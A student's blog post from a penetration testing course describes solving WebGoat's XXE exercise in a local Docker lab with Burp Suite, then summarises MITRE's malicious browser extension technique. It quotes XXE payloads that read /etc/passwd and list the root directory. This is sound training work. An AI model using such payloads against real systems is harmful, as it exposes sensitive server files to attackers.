I’m currently attending an intensive penetration testing course in Haaga-Helia summer semester. The course is held by Tero Karvinen (http://terokarvinen.com/) and it takes 1.5 weeks. Every day there’s 8 hours of lectures and these assignments. Every exercise can be found from our lecturer’s site, from this link: http://terokarvinen.com/2019/penetration-testing-tunkeutumistestaus-ict4tn027-3004-intensive-summer-course-2019-w21w22-5-credits.
This day’s assignments were 1. Solve some WebGoat exercise and then reporting, if you used any of the OWASP 10 vulnerabilities (https://www.owasp.org/images/7/72/OWASP_Top_10-2017_(en).pdf.pdf). 2. Mention an example from MITRE’s ATT&CK technique (https://attack.mitre.org/), that could be used for web.
WebGoat and OWASP 10
I started this assignment by starting my WebGoat server in docker. Then I headed over to http://localhost:8080/WebGoat/ and started looking for an interesting exploitable section. My eye was caught on XXE, as I’ve seen it been done but have never actually performed it myself.
This was the page that popped up:
I tested by entering some test data, but as could be expected, nothing happened. Then I started Burp Suite to see the request better – what is really happening.
It’s XML as could’ve been guessed. I tried the correct parameter “BOS”, which was mentioned in the assignment.
We get some data out. Now, how can we exploit this to show contents of root directory? I searched some examples to perform XXE and I found OWASP’s page (https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing) covering this topic. I took the example, I thought to be the most useful and it’s this one:
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
I inserted that to the request with few alterations first. I made my request look like this:
This however didn’t work. It’s most likely because it is expecting a file, but is handed a directory, I’m not sure. More searching required.
I noticed that I did it the wrong way, as this blog post helped me to figure it out (https://medium.com/bugbountywriteup/devoops-an-xml-external-entity-xxe-hackthebox-walkthrough-fb5ba03aaaa2). The entity is meant to be created before assigning the call to it:
However, it still didn’t work. I feel like I’m missing a way to assign system commands like “ls” to this entity. Even more research required.
I found this post https://enciphers.com/how-to-exploit-xxe-vulnerabilities/. There was an example, which happened to be this exercise. There the XML Entity part looked like this:
<?xml version="1.0"?> <!DOCTYPE xmlattack [ <!ENTITY sname SYSTEM "file:/"> ]> <searchForm> <from>&sname;</from> </searchForm>
There’s a few differences. Apparently, my problem was the created element. In my case, I didn’t need to create the element, the element was already there. So here’s the actual solution:
That was only thing I was missing. I was creating and element but in this case the is the element we wanted to exploit, not create a new one where we would call it. The more you know.
So in this case, yes, I did use one of OWASP’s top 10, this happened to be number 4, so it really is a high priority one and good to know more of. Great learning experience.
MITRE ATT&CK
In this assignment, the point was to find an ATT&CK technique from MITRE’s website, that could be used for web. This task was far more difficult than I was expecting. There were so many techniques and most seemed to be focused around other than web. I chose the Browser Extension one (https://attack.mitre.org/techniques/T1176/).
Browser extensions are small applications installed in the browser to add some functionalities and benefits for the user. They have all the same rights as the browser does.
Malicious browser extensions can be masked as regular extensions. User can download these from browsers app store, where all the other legitimate extensions are as well. Once user has installed the extension, it can then steal credentials, monitor network traffic, browse other websites in the background and even install a Remote Access Troijan for persistent access.
Stolen Pencil (https://attack.mitre.org/groups/G0086/) group has used this technique in form of Google Chrome extensions. The malicious extension gave attackers the ability to read data from any site accessed.
Santeri's Pentesting Blog 